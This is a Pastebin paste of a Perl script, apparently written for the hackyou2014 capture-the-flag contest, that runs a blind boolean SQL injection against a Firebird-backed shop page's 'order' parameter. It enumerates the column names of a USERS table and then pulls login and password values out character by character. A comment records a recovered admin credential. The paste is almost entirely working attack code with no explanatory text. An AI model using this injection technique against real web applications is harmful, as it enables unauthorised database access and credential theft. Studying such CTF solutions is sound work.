Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- use LWP::Simple;
- #username:password
- #admin:9shS3FAk
- # extract columns from USERS
- $url="http://hackyou2014tasks.ctf.su:30080/index.php?page=shop&order=";
- $fst="case when(1=(select first 1 1 from rdb\$relation_fields where lower(RDB\$RELATION_NAME)=ascii_char(117)||ascii_char(115)||ascii_char(101)||ascii_char(114)||ascii_char(115) and lower(rdb\$field_name) LIKE ";
- $snd="||ascii_char(37) )) then (select first 1 1 from rdb\$relations) else (select first 2 1 from rdb\$relations) end";
- $b=0;
- # LOGIN column part
- for($j=0;$j<100;$j++){
- for($i=97;$i<122;$i++){
- $sql=$url.$fst."ascii_char(".$i.")".$snd;
- #print "j: ".$j." i:".$i."\n";
- $html=get $sql;
- if ($html=~/1337/ && $i!=37 && $i!=95){
- print chr($i);
- $fst.="ascii_char(".$i.")||";
- last;
- }else{
- $b++;
- }
- }
- if($b==122-97){
- last;
- }else{
- $b=0;
- }
- }
- print "\n";
- # PASSWD column part
- $fst="case when(1=(select first 1 1 from rdb\$relation_fields where lower(RDB\$RELATION_NAME)=ascii_char(117)||ascii_char(115)||ascii_char(101)||ascii_char(114)||ascii_char(115) and lower(rdb\$field_name) LIKE ";
- $b=0;
- for($j=0;$j<100;$j++){
- for($i=97;$i<122;$i++){
- $sql=$url.$fst."ascii_char(".$i.")".$snd;
- $html=get $sql;
- if ($html=~/1337/ && $i!=37 && $i!=95 && $i!=108){
- print chr($i);
- $fst.="ascii_char(".$i.")||";
- last;
- }else{
- $b++;
- }
- }
- if($b==122-97){
- last;
- }else{
- $b=0;
- }
- }
- print "\n";
- #extract data from USERS ( LOGIN,PASSWD)
- $fst="case when(1=(select first 1 1 from USERS where LOGIN LIKE ";
- $snd="||ascii_char(37) )) then (select first 1 1 from rdb\$relations) else (select first 2 1 from rdb\$relations) end";
- for($j=0;$j<100;$j++){
- for($i=65;$i<=122;$i++){
- $sql=$url.$fst."ascii_char(".$i.")".$snd;
- #print $j." ".$i."\n";
- $html=get $sql;
- if ($html=~/1337/ && $i!=37 && $i!=95){
- print chr($i)."\n";
- $fst.="ascii_char(".$i.")||";
- last;
- }else{
- $b++;
- }
- }
- if($b==123-65){
- last;
- }else{
- $b=0;
- }
- }
- print "\n";
- $fst="case when(1=(select first 1 1 from USERS where PASSWD LIKE ";
- $snd="||ascii_char(37) )) then (select first 1 1 from rdb\$relations) else (select first 2 1 from rdb\$relations) end";
- for($j=0;$j<100;$j++){
- for($i=48;$i<=122;$i++){
- $sql=$url.$fst."ascii_char(".$i.")".$snd;
- #print $j." ".$i."\n";
- $html=get $sql;
- if ($html=~/1337/ && $i!=37 && $i!=95){
- print chr($i)."\n";
- $fst.="ascii_char(".$i.")||";
- last;
- }else{
- $b++;
- }
- }
- if($b==123-48){
- last;
- }else{
- $b=0;
- }
- }
- print "\n";
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement